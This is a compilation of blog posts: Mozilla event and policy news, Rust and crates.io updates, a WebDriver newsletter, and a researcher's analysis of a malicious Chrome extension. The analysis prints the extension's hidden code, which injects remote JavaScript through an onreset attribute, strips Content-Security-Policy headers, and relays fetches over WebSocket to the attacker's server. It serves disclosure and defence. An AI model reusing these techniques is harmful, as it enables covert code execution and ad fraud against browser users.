  • Nazim Can Altinova, another Firefox engineer working on the Firefox Profiler, also presented a talk in the Web Performance track. It’s also worth mentioning that the Web Performance devroom was co-run by some Mozillians.
  • Danny Colin, one of Mozilla’s active contributors, hosted a WebExtension BoF session featuring representatives from Mozilla Firefox (Rob Wu & Simeon Vincent) and Google Chrome’s extensions team (Oliver Dunk). This was the first time the team ran a Birds Of a Feather session, and it’s very likely that we’re going to do the same next year.
  • Danny Colin also hosted the Community Gathering where old and new contributors got together to discuss the future of Mozilla’s community. It was really nice to have an interactive session like this where all of us could share our perspectives, so thank you to all of you who attended the session!

Highlights from Sunday

Mitchell Baker is presenting at FOSDEM 2025

  • Mitchell Baker kicked off Sunday with a keynote session that offered a thought-provoking exploration of Free/Libre Open Source Software (FLOSS) in the age of artificial intelligence and demonstrated how Mozilla plays a role in defining a principled approach to AI that prioritizes transparency, ethics, and community-driven innovation. It was a perfect opening for the talks that we presented at the Mozilla devroom later that day.
  • Around the same time as Mitchell’s session, Mozilla engineer Max Inden also delivered a presentation in the Network devroom, showcasing various techniques the Firefox team uses to enhance Firefox performance.
  • Then in the second half of Sunday, we also hosted the Mozilla devroom, where we covered a wide range of Mozilla’s latest innovations, from Mythbusting to Mozilla’s AI innovations and Firefox developments. Recordings will be available soon on FOSDEM’s website and via our YouTube channel. So stay tuned!

We’re grateful for the enthusiasm, conversations, and curiosity of attendees at FOSDEM 2025. And big thanks to our amazing volunteers and Mozillians for co-hosting our booth and the Mozilla devroom this year.

We sure had a blast, and we can’t wait to see you again next year!

This Week In Rust: This Week in Rust 585

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is ratzilla, a library for building terminal-themed web applications with Rust and WebAssembly.

Thanks to Orhun Parmaksız for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

No Calls for papers or presentations were submitted this week.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

425 pull requests were merged in the last week

Rust Compiler Performance Triage

A very quiet week with performance of primary benchmarks showing no change overall.

Triage done by @rylev. Revision range: f7538506..01e4f19c

Summary:

(instructions:u)             mean    range             count
Regressions ❌ (primary)     0.3%    [0.2%, 0.6%]      32
Regressions ❌ (secondary)   0.5%    [0.1%, 1.1%]      65
Improvements ✅ (primary)    -0.5%   [-1.0%, -0.2%]    17
Improvements ✅ (secondary)  -3.1%   [-10.3%, -0.2%]   20
All ❌✅ (primary)           0.0%    [-1.0%, 0.6%]     49

5 Regressions, 2 Improvements, 5 Mixed; 6 of them in rollups. 49 artifact comparisons made in total.

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-02-05 - 2025-03-05 🦀

Virtual
Africa
Asia
Europe
North America
South America:

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

If your rust code compiles and you don't use "unsafe", that is a pretty good certification.

Richard Gould about Rust certifications on rust-users

Thanks to ZiCog for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Rust Programming Language Blog: crates.io: development update

Back in July 2024, we published a blog post about the ongoing development of crates.io. Since then, we have made a lot of progress and shipped a few new features. In this blog post, we want to give you an update on the latest changes that we have made to crates.io.

Crate deletions

In RFC #3660 we proposed a new feature that allows crate owners to delete their crates from crates.io under certain conditions. This can be useful if you have published a crate by mistake or if you want to remove a crate that is no longer maintained. After the RFC was accepted by all team members at the end of August, we began implementing the feature.

We created a new API endpoint DELETE /api/v1/crates/:name that allows crate owners to delete their crates and then created the corresponding user interface. If you are the owner of a crate, you can now go to the crate page, open the "Settings" tab, and find the "Delete this crate" button at the bottom. Clicking this button will lead you to a confirmation page telling you about the potential impact of the deletion and requirements that need to be met in order to delete the crate:

Delete Page Screenshot

As you can see from the screenshot above, a crate can only be deleted if either:

  • the crate has been published for less than 72 hours, or
  • the crate only has a single owner, has been downloaded less than 500 times for each month it has been published, and is not depended upon by any other crate on crates.io.

These requirements were put in place to prevent abuse of the deletion feature and to ensure that crates that are widely used by the community are not deleted accidentally. If you have any feedback on this feature, please let us know!
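
If you prefer scripting over the web UI, calling the endpoint directly might look roughly like the sketch below; the authentication details shown are an assumption rather than documented behavior, and the web UI described above remains the recommended path.

// Rough sketch only: invoking the new deletion endpoint from a script.
// Authentication details may differ in practice; the web UI is the recommended path.
const crateName = "my-abandoned-crate"; // hypothetical crate that you own
const response = await fetch(`https://crates.io/api/v1/crates/${crateName}`, {
  method: "DELETE",
  headers: { Authorization: process.env.CRATES_IO_TOKEN ?? "" }, // assumed: plain API token
});
console.log(response.status); // expect an error status if the requirements above are not met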

OpenAPI description

Around the holiday season we started experimenting with generating an OpenAPI description for the crates.io API. This was a long-standing request from the community, and we are happy to announce that we now have an experimental OpenAPI description available at https://crates.io/api/openapi.json!

Please note that this is still considered a work in progress: for example, the stability guarantees for the endpoints are not written down yet, and the response schemas are also not fully documented.

You can view the OpenAPI description in e.g. a Swagger UI at https://petstore.swagger.io/ by putting https://crates.io/api/openapi.json in the top input field. We decided to not ship a viewer ourselves for now due to security concerns with running it on the same domain as crates.io itself. We may reconsider whether to offer it on a dedicated subdomain in the future if there is enough interest.

Swagger UI Screenshot
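
For a quick programmatic look, assuming the document follows the usual OpenAPI layout, you can also list the described endpoints from a short script:

// Fetch the experimental OpenAPI description and list the endpoint paths it documents.
const spec = await (await fetch("https://crates.io/api/openapi.json")).json();
console.log(Object.keys(spec.paths ?? {})); // the documented endpoint paths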

The OpenAPI description is generated by the utoipa crate, which is a tool that can be integrated with the axum web framework to automatically generate OpenAPI descriptions for all of your endpoints. We would like to thank Juha Kukkonen for his great work on this tool!

Support form and "Report Crate" button

Since the crates.io team is small and mostly consists of volunteers, we do not have the capacity to manually monitor all publishes. Instead, we rely on you, the Rust community, to help us catch malicious crates and users. To make it easier for you to report suspicious crates, we added a "Report Crate" button to all the crate pages. If you come across a crate that you think is malicious or violates the code of conduct or our usage policy, you can now click the "Report Crate" button and fill out the form that appears. This will send an email to the crates.io team, who will then review the crate and take appropriate action if necessary. Thank you to crates.io team member @eth3lbert who worked on the majority of this.

If you have any issues with the support form or the "Report Crate" button, please let us know. You can also always email us directly at help@crates.io if you prefer not to use the form.

Publish notifications

We have added a new feature that allows you to receive email notifications when a new version of your crate is published. This can be useful in detecting unauthorized publishes of your crate or simply to keep track of publishes from other members of your team.

Publish Notification Screenshot

This feature was another long-standing feature request from our community, and we were happy to finally implement it. If you'd prefer not to receive publish notifications, then you can go to your account settings on crates.io and disable these notifications.

Miscellaneous

These were some of the more visible changes to crates.io over the past couple of months, but a lot has happened "under the hood" as well.

  • RFC #3691 was opened and accepted to implement "Trusted Publishing" support on crates.io, similar to other ecosystems that adopted it. This will allow you to specify on crates.io which repository/system is allowed to publish new releases of your crate, allowing you to publish crates from CI systems without having to deal with API tokens anymore.

  • Slightly related to the above: API tokens created on crates.io now expire after 90 days by default. It is still possible to disable the expiry or choose other expiry durations though.

  • crates.io was one of the first projects to use the diesel database access library, but since that only supported synchronous execution it was sometimes a little awkward to use in our codebase, which was increasingly moving into an async direction after our migration to axum a while ago. The maintainer of diesel, Georg Semmler, did a lot of work to make it possible to use diesel in an async way, resulting in the diesel-async library. Over the past couple of months we incrementally ported crates.io over to diesel-async queries, which now allows us to take advantage of the internal query pipelining in diesel-async that resulted in some of our API endpoints getting a 10-15% performance boost. Thank you, Georg, for your work on these crates!

  • Whenever you publish a new version or yank/unyank existing versions a couple of things need to be updated. Our internal database is immediately updated, and then we synchronize the sparse and git index in background worker jobs. Previously, yanking and unyanking a high number of versions would each queue up another synchronization background job. We have now implemented automatic deduplication of redundant background jobs, making our background worker a bit more efficient.

  • The final big, internal change that was just merged last week is related to the testing of our frontend code. In the past we used a tool called Mirage to implement a mock version of our API, which allowed us to run our frontend test suite without having to spin up a full backend server. Unfortunately, the maintenance situation around Mirage had lately forced us to look into alternatives, and we are happy to report that we have now fully migrated to the "Industry standard API mocking" package msw. If you want to know more, you can find the details in the "small" migration pull request.

Feedback

We hope you enjoyed this update on the development of crates.io. If you have any feedback or questions, please let us know on Zulip or GitHub. We are always happy to hear from you and are looking forward to your feedback!

Firefox Developer Experience: Firefox WebDriver Newsletter 135

WebDriver is a remote control interface that enables introspection and control of user agents. As such it can help developers to verify that their websites are working and performing well with all major browsers. The protocol is standardized by the W3C and consists of two separate specifications: WebDriver classic (HTTP) and the new WebDriver BiDi (Bi-Directional).

This newsletter gives an overview of the work we’ve done as part of the Firefox 135 release cycle.

Contributions

Firefox is an open source project, and we are always happy to receive external code contributions to our WebDriver implementation. We want to give special thanks to everyone who filed issues, bugs and submitted patches.

In Firefox 135, several contributors managed to land fixes and improvements in our codebase:

WebDriver code is written in JavaScript, Python, and Rust so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues for Marionette, or the list of mentored JavaScript bugs for WebDriver BiDi. Join our chatroom if you need any help to get started!

General

Improved user interactions simulation

To make user events more realistic and better simulate real user interactions in the browser, we have moved the action sequence processing of the Perform Actions commands in both Marionette and WebDriver BiDi from the content process to the parent process. While events are still sent synchronously from the content process, they are now triggered asynchronously via IPC calls originating from the parent process.

Due to this significant change, you might experience some regressions. If you encounter any issues, please file a bug for the Remote Agent. If the regressions block test execution, you can temporarily revert to the previous behavior by setting the Firefox preference remote.events.async.enabled to false.
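
For example, when using geckodriver the preference can be set at session creation time through moz:firefoxOptions; the capabilities payload below is a sketch rather than an excerpt from the release notes:

{
  "capabilities": {
    "alwaysMatch": {
      "moz:firefoxOptions": {
        "prefs": {
          "remote.events.async.enabled": false
        }
      }
    }
  }
}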

With the processing of actions now handled in the parent process, the following issues were fixed as well:

WebDriver BiDi

New: format argument for browsingContext.captureScreenshot

Thanks to Liam’s work, the browsingContext.captureScreenshot command now supports the format argument. It allows clients to specify different file formats ("image/png" and "image/jpeg" are currently supported) and define the compression quality for screenshots.

The argument should follow the browsingContext.ImageFormat type, with a "type" property which is expected to be a string, and an optional "quality" property which can be a float between 0 and 1.

-> {
  "method": "browsingContext.captureScreenshot",
  "params": {
    "context": "6b1cd006-96f0-4f24-9c40-a96a0cf71e22",
    "origin": "document",
    "format": {
      "type": "image/jpeg",
      "quality": 0.1
    }
  },
  "id": 3
}

<- {
  "type": "success",
  "id": 3,
  "result": {
    "data": "iVBORw0KGgoAAAANSUhEUgAA[...]8AbxR064eNvgIAAAAASUVORK5CYII="
  }
}

Bug Fixes

Mozilla Open Policy & Advocacy Blog: Navigating the Future of Openness and AI Governance: Insights from the Paris Openness Workshop

In December 2024, in the lead up to the AI Action Summit, Mozilla, Fondation Abeona, École Normale Supérieure (ENS) and the Columbia Institute of Global Politics gathered at ENS in Paris, bringing together a diverse group of AI experts, academics, civil society, regulators and business leaders to discuss a topic increasingly central to the future of AI: what openness means and how it can enable trustworthy, innovative, and equitable outcomes.

The workshop followed the Columbia Convenings on Openness and AI, which Mozilla held in partnership with Columbia University’s Institute of Global Politics. These gatherings, held over the course of 2024 in New York and San Francisco, have brought together over 40 experts to address what “openness” should mean in the AI era.

Over the past two years, Mozilla has mounted a significant effort to promote and defend the role of openness in AI. Mozilla launched Mozilla.ai, an initiative focused on ethical, open-source AI tools, and supported small-scale, localized AI projects through its Builders accelerator program. Beyond technical investments, Mozilla has also been a vocal advocate for openness in AI policy, urging governments to adopt regulatory frameworks that foster competition and accountability while addressing risks. Through these initiatives, Mozilla is shaping a future where AI development aligns with public interest values.

This Paris Openness workshop discussion — part of the official ‘Road to the Paris AI Summit’ taking place in February 2025 — looked to bring together the European AI community and form actionable recommendations for policymakers. While it embraced healthy debate and disagreement around issues such as definitions of openness in AI, there was nevertheless broad agreement on the urgency of crafting collective ideas to advance openness while navigating an increasingly complex commercial, political and regulatory landscape.

The stakes could not be higher. As AI continues to shape our societies, economies, and governance systems, openness emerges as both an opportunity and a challenge. On one hand, open approaches can expand access to AI tools, foster innovation, and enhance transparency and accountability. On the other hand, they raise complex questions about safety and misuse. In Europe, these questions intersect with transformative regulatory frameworks like the EU AI Act, which seeks to ensure that AI systems are both safe and aligned with fundamental rights.

As in software development, the goal of being ‘open’ in AI is a crucial one. At its heart, openness, we were reminded in the discussion, is a holistic outlook. For AI in particular it is a pathway to getting to a more pluralistic tool – one that can be more transparent, contextual, participatory and culturally appropriate. Each of these goals, however, contains natural tensions within it.

A central question of this most recent dialogue challenged participants on the best ways to build with safety in mind while also embracing openness. The day was broken down into two workshops that examined these questions from a technical and policy standpoint.

Running through both of the workshops was the thread of a persistent challenge: the multifaceted nature of the term openness. In the policy context, the term “open-source” can be too narrow, and at times, it risks being seen as an ideological stance rather than a pragmatic tool for addressing specific issues. To address this, many participants felt openness should be framed as a set of components — including open models, data, and tools — each of which has specific benefits and risks.

Examining Technical Perspectives on Openness and Safety

A significant concern for many in the open-source community is getting access to the best existing safety tools. Despite the increasing importance of AI safety, many researchers can find it difficult or expensive to access tools to help identify and address AI risks. In particular, the discussion surfaced an increasing tension between some researchers and startups who have found it difficult to access datasets of known CSAM (Child Sexual Abuse Material) hashes. Accessing these datasets could help mitigate misuse or clean training datasets. The workshop called for broader sharing of safety tools and more support for those working at the cutting edge of AI development.

More widely, some participants were frustrated by perceptions that open source AI development is not bothered by questions of safety. They pointed out that, especially when it comes to regulation, focusing on questions of safety makes them even more competitive.

Discussing Policy Implications of Openness in AI

Policy discussions during the workshop focused on the economic, societal, and regulatory dimensions of openness in AI. These ranged over several themes, including:

  1. Challenging perceptions of openness: There is a clear need to change the narrative around openness, especially in policymaking circles. The open-source community must both act as a community and present itself as knowledgeable and solution-oriented, demonstrating how openness can be a means to advancing the public interest — not an abstract ideal. As one participant pointed out, openness should be viewed as a tool for societal benefit, not as an end in itself.
  2. Tensions between regulation and innovation are misleading: As one of the first regulatory frameworks on AI to be drafted, many people view the EU’s AI Act as a test bed to get to smarter AI regulation. While there is a widespread characterisation of regulation obstructing innovation, some participants highlighted that this can be misleading — many new entrants seek out jurisdictions with favourable regulatory and competition policies that level the playing field.
  3. A changing U.S. Perspective: In the United States, the open-source AI agenda has gained significant traction, particularly in the wake of incidents like the Llama leaks, which showed that many of the feared risks associated with openness did not materialize. Significantly, the U.S. National Telecommunications and Information Administration emphasized the benefits of open source AI technology and introduced a nuanced view of safety concerns around open-weight AI models.

Many participants also agreed that policymakers, many of whom are not deeply immersed in the technicalities of AI, need a clearer framework for understanding the value of openness. Considering the focus of the upcoming Paris AI Summit, some participants felt one solution could lie in focusing on public interest AI. This concept resonates more directly with broader societal goals while still acknowledging the risks and challenges that openness brings.

Recommendations 

Embracing openness in AI is non-negotiable if we are to build trust and safety; it fosters transparency, accountability, and inclusive collaboration. Openness must extend beyond software to broader access to the full AI stack, including data and infrastructure, with governance that safeguards the public interest and prevents monopolization.

It is clear that the open source community must make its voice louder. If AI is to advance competition, innovation, language, research, culture and creativity for the global majority of people, then an evidence-based approach to the benefits of openness, particularly when it comes to proven economic benefits, is essential for driving this agenda forward.

Several recommendations for policymakers also emerged.

  1. Diversify AI Development: Policymakers should seek to diversify the AI ecosystem, ensuring that it is not dominated by a few large corporations in order to foster more equitable access to AI technologies and reduce monopolistic control. This should be approached holistically, looking at everything from procurement to compute strategies.
  2. Support Infrastructure and Data Accessibility: There is an urgent need to invest in AI infrastructure, including access to data and compute power, in a way that does not exacerbate existing inequalities. Policymakers should prioritize distribution of resources to ensure that smaller actors, especially those outside major tech hubs, are not locked out of AI development.
  3. Understand openness as central to achieving AI that serves the public interest. One of the official tracks of the upcoming Paris AI Action Summit is Public Interest AI. Increasingly, openness should be deployed as a main route to truly publicly interested AI.
  4. Openness should be an explicit EU policy goal: As one of the furthest along in AI regulatory frameworks the EU will continue to be a testbed for many of the big questions in AI policy. The EU should adopt an explicit focus on promoting openness in AI as a policy goal.

We will be raising all the issues discussed while at the AI Action Summit in Paris. The organizers hope to host another set of these discussions following the conclusion of the Summit in order to continue working with the community and to better inform governments and other stakeholders around the world.

The list of participants at the Paris Openness Workshop is below:

  • Linda Griffin – VP of Global Policy, Mozilla
  • Udbhav Tiwari – Director, Global Product Policy, Mozilla
  • Camille François – Researcher, Columbia University
  • Tanya Perelmuter – Co-founder and Director of Strategy, Fondation Abeona
  • Yann Lechelle – CEO, Probabl
  • Yann Guthmann – Head of the Digital Economy Department at the French Competition Authority
  • Adrien Basdevant – Tech lawyer, Entropy Law
  • Andrzej Neugebauer – AI Program Director, LINAGORA
  • Thierry Poibeau – Director of Research, CNRS, ENS
  • Nik Marda – Technical Lead for AI Governance, Mozilla
  • Andrew Strait – Associate Director, Ada Lovelace Institute (UK)
  • Paul Keller – Director of Policy, Open Future (Netherlands)
  • Guillermo Hernandez – AI Policy Analyst, OECD
  • Sandrine Elmi Hersi – Unit Chief of “Open Internet”, ARCEP

The post Navigating the Future of Openness and AI Governance: Insights from the Paris Openness Workshop appeared first on Open Policy & Advocacy.

Wladimir Palant: Analysis of an advanced malicious Chrome extension

Two weeks ago I published an article on 63 malicious Chrome extensions. In most cases I could only identify the extensions as malicious. With large parts of their logic being downloaded from some web servers, it wasn’t possible to analyze their functionality in detail.

However, for the Download Manager Integration Checklist extension I have all parts of the puzzle now. This article is a technical discussion of its functionality that somebody tried very hard to hide. I was also able to identify a number of related extensions that were missing from my previous article.

Update (2025-02-04): An update to Download Manager Integration Checklist extension has been released a day before I published this article, clearly prompted by me asking adindex about this. The update removes the malicious functionality and clears extension storage. Luckily, I’ve saved both the previous version and its storage contents.

Screenshot of an extension pop-up. The text in the popup says “Seamlessly integrate the renowned Internet Download Manager (IDM) with Google Chrome, all without the need for dubious third-party extensions” followed up with some instructions.

The problematic extensions

Since my previous article I found a bunch more extensions with malicious functionality that is almost identical to Download Manager Integration Checklist. The extension Auto Resolution Quality for YouTube™ does not seem to be malicious (yet?) but shares many remarkable oddities with the other extensions.

Name Weekly active users Extension ID Featured
Freemybrowser 10,000 bibmocmlcdhadgblaekimealfcnafgfn
AutoHD for Twitch™ 195 didbenpmfaidkhohcliedfmgbepkakam
Free simple Adult Blocker with password 1,000 fgfoepffhjiinifbddlalpiamnfkdnim
Convert PDF to JPEG/PNG 20,000 fkbmahbmakfabmbbjepgldgodbphahgc
Download Manager Integration Checklist 70,000 ghkcpcihdonjljjddkmjccibagkjohpi
Auto Resolution Quality for YouTube™ 223 hdangknebhddccoocjodjkbgbbedeaam
Adblock.mx - Adblock for Chrome 1,000 hmaeodbfmgikoddffcfoedogkkiifhfe
Auto Quality for YouTube™ 100,000 iaddfgegjgjelgkanamleadckkpnjpjc
Anti phising safer browsing for chrome 7,000 jkokgpghakemlglpcdajghjjgliaamgc
Darktheme for google translate 40,000 nmcamjpjiefpjagnjmkedchjkmedadhc

Additional IOCs:

  • adblock[.]mx
  • adultblocker[.]org
  • autohd[.]org
  • autoresolutionquality[.]com
  • browserguard[.]net
  • freemybrowser[.]com
  • freepdfconversion[.]com
  • internetdownloadmanager[.]top
  • megaxt[.]com
  • darkmode[.]site

“Remote configuration” functionality

The Download Manager Integration Checklist extension was an odd one on the list in my previous article. It has very minimal functionality: it’s merely supposed to display a set of instructions. This is a task that doesn’t require any permissions at all, yet the extension requests access to all websites and declarativeNetRequest permission. Apparently, nobody noticed this inconsistency so far.

Looking at the extension code, there is another oddity. The checklist displayed by the extension is downloaded from Firebase, Google’s online database. Yet there is also a download from https://help.internetdownloadmanager.top/checklist, with the response being handled by this function:

async function u(l) {
  await chrome.storage.local.set({ checklist: l });

  await chrome.declarativeNetRequest.updateDynamicRules({
    addRules: l.list.add,
    removeRuleIds: l.list.rm,
  });
}

This is what I flagged as malicious functionality initially: part of the response is used to add declarativeNetRequest rules dynamically. At first I missed something however: the rest of the data being stored as checklist is also part of the malicious functionality, allowing execution of remote code:

function f() {
  let doc = document.documentElement;
  function updateHelpInfo(info, k) {
    doc.setAttribute(k, info);
    doc.dispatchEvent(new CustomEvent(k.substring(2)));
    doc.removeAttribute(k);
  }

  document.addEventListener(
    "description",
    async ({ detail }) => {
      const response = await chrome.runtime.sendMessage(
        detail.msg,
      );
      document.dispatchEvent(
        new CustomEvent(detail.responseEvent, {
          detail: response,
        }),
      );
    },
  );

  chrome.storage.local.get("checklist").then(
    ({ checklist }) => {
      if (checklist && checklist.info && checklist.core) {
        updateHelpInfo(checklist.info, checklist.core);
      }
    },
  );
}

There is a tabs.onUpdated listener hidden within the legitimate webextension-polyfill module that will run this function for every web page via the tabs.executeScript API.

This function looks fairly unsuspicious. Understanding its functionality is easier if you know that checklist.core is "onreset". So it takes the document element, fills its onreset attribute with some JavaScript code from checklist.info, triggers the reset event and removes the attribute again. That’s how this extension runs some server-provided code in the context of every website.
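
For illustration, here is a minimal stand-alone sketch of the technique (not the extension’s exact code):

// Minimal sketch of the attribute trick described above (not the extension's exact code).
// A string placed in an event handler attribute becomes live code once the event fires.
let doc = document.documentElement;
doc.setAttribute("onreset", "console.log('attacker-controlled code runs here')");
doc.dispatchEvent(new Event("reset")); // fires the onreset handler, executing the string
doc.removeAttribute("onreset");        // clean up, leaving no trace in the DOM
// Note: a page CSP forbidding inline event handlers would normally block this,
// which is why the extension also strips CSP headers (see below).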

The code being executed

When the extension downloads its “checklist” immediately after installation the server response will be empty. Sort of: “nothing to see here, this is merely some dead code somebody forgot to remove.” The server sets a cookie however, allowing it to recognize the user on subsequent downloads. And only after two weeks or so it will respond with the real thing. For example, the list key of the response looks like this then:

"add": [
  {
    "action": {
      "responseHeaders": [
        {
          "header": "Content-Security-Policy-Report-Only",
          "operation": "remove"
        },
        {
          "header": "Content-Security-Policy",
          "operation": "remove"
        }
      ],
      "type": "modifyHeaders"
    },
    "condition": {
      "resourceTypes": [
        "main_frame"
      ],
      "urlFilter": "*"
    },
    "id": 98765432,
    "priority": 1
  }
],
"rm": [
  98765432
]

No surprise here, this is about removing Content Security Policy protection from all websites, making sure it doesn’t interfere when the extension injects its code into web pages.

As I already mentioned, the core key of the response is "onreset", an essential component towards executing the JavaScript code. And the JavaScript code in the info key is heavily obfuscated by JavaScript Obfuscator, with most strings and property names encrypted to make reverse engineering harder.

Of course this kind of obfuscation can still be reversed, and you can see the entire deobfuscated code here. Note that most function and variable names have been chosen randomly, the original names being meaningless. The code consists of three parts:

  1. Marshalling of various extension APIs: tabs, storage, declarativeNetRequest. This uses DOM events to communicate with the function f() mentioned above, this function forwards the messages to the extension’s background worker and the worker then calls the respective APIs.

    In principle, this allows reading out your entire browser state: how many tabs, what pages are loaded etc. Getting notified on changes is possible as well. The code doesn’t currently use this functionality, but the server can of course produce a different version of it any time, for all users or only for selected targets.

    There is also another aspect here: in order to run remote code, this code has been moved into the website realm. This means, however, that any website can abuse these APIs as well. It’s only a matter of knowing which DOM events to send. Yes, this is a massive security issue (a sketch of such abuse follows after this list).

  2. Code downloading a 256 KiB binary blob from https://st.internetdownloadmanager.top/bff and storing it in encoded form as bff key in the extension storage. No, this isn’t your best friend forever but a Bloom filter. This filter is applied to SHA-256 hashes of domain names and determines on which domain names the main functionality should be activated.

    With Bloom filters, it is impossible to determine which exact data went into it. It is possible however to try out guesses, to see which one it accepts. Here is the list of matching domains that I could find. This list looked random to me initially, and I even suspected that noise has been added to it in order to hide the real target domains. Later however I could identify it as the list of adindex advertisers, see below.

  3. The main functionality: when active, it sends the full address of the current page to https://st.internetdownloadmanager.top/cwc2 and might get a “session” identifier back. It is likely that this server stores the addresses it receives and sells the resulting browsing history. This part of the functionality stays hidden however.

    The “session” handling is visible on the other hand. There is some rate limiting here, making sure that this functionality is triggered at most once per minute and no more than once every 12 hours for each domain. If activated, a message is sent back to the extension’s background worker telling it to connect to wss://pa.internetdownloadmanager.top/s/<session>. All further processing happens there.
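
To make the abuse scenario from point 1 concrete, here is a rough sketch of what an arbitrary web page could do once this bridge is in place. The event names come from the function f() shown earlier; the msg payload is a placeholder, since the exact messages the background worker accepts are only defined in the remotely loaded code.

// Rough sketch of the abuse scenario: a regular web page talking to the
// extension's background worker through the DOM-event bridge set up by f().
// The msg value is a placeholder assumption, not a documented message format.
document.addEventListener("my-response", event => {
  console.log("reply from the extension's background worker:", event.detail);
});
document.dispatchEvent(new CustomEvent("description", {
  detail: {
    msg: { /* placeholder: whatever request the background worker understands */ },
    responseEvent: "my-response",
  },
}));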

The “session” handling

Here we are back in the extension’s static code, no longer remotely downloaded code. The entry point for the “session” handling is function __create. Its purpose has been concealed, with some essential property and method names contained in the obfuscated code above or received from the web socket connection. I filled in these parts and simplified the code to make it easier to understand:

var __create = url => {
  const socket = new this.WebSocket(url);
  const buffer = {};
  socket.onmessage = event => {
    let message = event.data.arrayBuffer ? event.data : JSON.parse(event.data);
    this.stepModifiedMatcher(socket, buffer, message)
  };
};

stepModifiedMatcher =
  async (socket, buffer, message) => {
    if (message.arrayBuffer)
      buffer[1] = message.arrayBuffer();
    else {
      let [url, options] = message;
      if (buffer[1]) {
        options.body = await buffer[1];
        buffer[1] = null;
      }

      let response = await this.fetch(url, options);
      let data = await Promise.all([
        !message[3] ? response.arrayBuffer() : false,
        JSON.stringify([...response.headers.entries()]),
        response.status,
        response.url,
        response.redirected,
      ]);
      for (const entry of data) {
        if (socket.readyState === 1) {
          socket.send(entry);
        }
      }
    }
  };

This receives instructions from the web socket connection on what requests to make. Upon success the extension sends information like response text, HTTP headers and HTTP status back to the server.

What is this good for? Before I could observe this code in action I was left guessing. Is this an elaborate approach to de-anonymize users? On some websites their name will be right there in the server response. Or is this about session hijacking? There would be session cookies in the headers and CSRF tokens in the response body, so the extension could be instrumented to perform whatever actions necessary on behalf of the attackers – like initiating a money transfer once the user logs into their PayPal account.

The reality turned out to be far more mundane. When I finally managed to trigger this functionality on the Ashley Madison website, I saw the extension perform lots of web requests. Apparently, it was replaying a browsing session that was recorded two days earlier with the Firefox browser. The entry point of this session: https://api.sslcertifications.org/v1/redirect?advertiserId=11EE385A29E861E389DA14DDA9D518B0&adspaceId=11EE4BCA2BF782C589DA14DDA9D518B0&customId=505 (redirecting to ashleymadison.com).

Developer Tools screenshot, listing a number of network requests. It starts with ashleymadison.com and loads a number of JavaScript and CSS files as well as images. All requests are listed as fetch requests initiated by background.js:361.

The server handling api.sslcertifications.org belongs to the German advertising company adindex. Their list of advertisers is mostly identical to the list of domains matched by the Bloom filter the extension uses. So this is ad fraud: the extension generates fake link clicks, making sure its owner earns money for “advertising” websites like Ashley Madison. It uses the user’s IP address and replays recorded sessions to make this look like legitimate traffic, hoping to avoid detection this way.

I contacted adindex and they confirmed that sslcertifications.org is a domain registered by a specific publisher but handled by adindex. They also said that they confronted the publisher in question with my findings and, having found their response unsatisfactory, blocked this publisher. Shortly afterwards the internetdownloadmanager.top domain became unreachable, and api.sslcertifications.org site no longer has a valid SSL certificate. Domains related to other extensions, the ones I didn’t mention in my request, are still accessible.

Who is behind these extensions?

The adindex CEO declined to provide the identity of the problematic publisher. There are obvious data protection reasons for that. However, as I looked further I realized that he might have additional reasons to withhold this information.

While most extensions I list provide clearly fake names and addresses, the Auto Quality for YouTube™ extension is associated with the MegaXT website. That website doesn’t merely feature a portfolio of two browser extensions (the second one being an older Manifest V2 extension also geared towards running remote code) but also a real owner with a real name. Who just happens to be a developer at adindex.

There is also the company eokoko GmbH, developing the Auto Resolution Quality for YouTube™ extension. This extension appears to be non-malicious at the moment, yet it shares a number of traits with the malicious extensions on my list. The director of this company is once again the same adindex developer.

And not just any developer. According to his website he used to be CTO at adindex in 2013 (I couldn’t find an independent confirmation for this). He also founded a company together with the adindex CEO in 2018, something that is confirmed by public records.

When I mentioned this connection in my communication with adindex CEO the response was:

